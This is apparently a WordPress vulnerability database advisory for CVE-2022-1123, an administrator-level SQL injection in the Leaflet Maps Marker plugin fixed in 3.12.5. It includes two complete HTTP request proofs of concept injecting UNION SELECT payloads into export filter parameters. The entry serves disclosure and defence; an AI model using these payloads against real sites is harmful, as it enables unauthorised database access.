WordPress Plugin Vulnerabilities

Leaflet Maps Marker < 3.12.5 - Admin+ SQLi

Description

The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.

Proof of Concept

PoC for filter-operator1 parameter:

POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 476
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=_NOT_FOUND_&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

======
PoC for filter-operator2 parameter:


POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 474
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=_NOT_FOUND_&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

Affects Plugins

Plugin icon
leaflet-maps-marker
Fixed in 3.12.5

References

CVE
CVE-2022-1123

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Ihor Bliumental
Submitter
Ihor Bliumental
Submitter website
https://bsg.tech/
Submitter twitter
igorblum
Verified
Yes
WPVDB ID
03e0d4d5-0184-4a15-b8ac-fdc2010e4812

Timeline

Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
ripe-hd-player 1.0 - ripe-hd-player/config.php id Parameter SQL Injection
Published
2021-08-04
Title
Availability Calendar < 1.2.1 - Authenticated SQL Injection
Published
2019-07-11
Title
FV Flowplayer Video Player < 7.3.19.727 - SQL Injection
Published
2021-02-08
Title
Data Tables Generator by Supsystic < 1.10.0 - Authenticated SQL Injection
Published
2021-11-08
Title
WP Data Access < 5.0.0 - Admin+ SQL Injection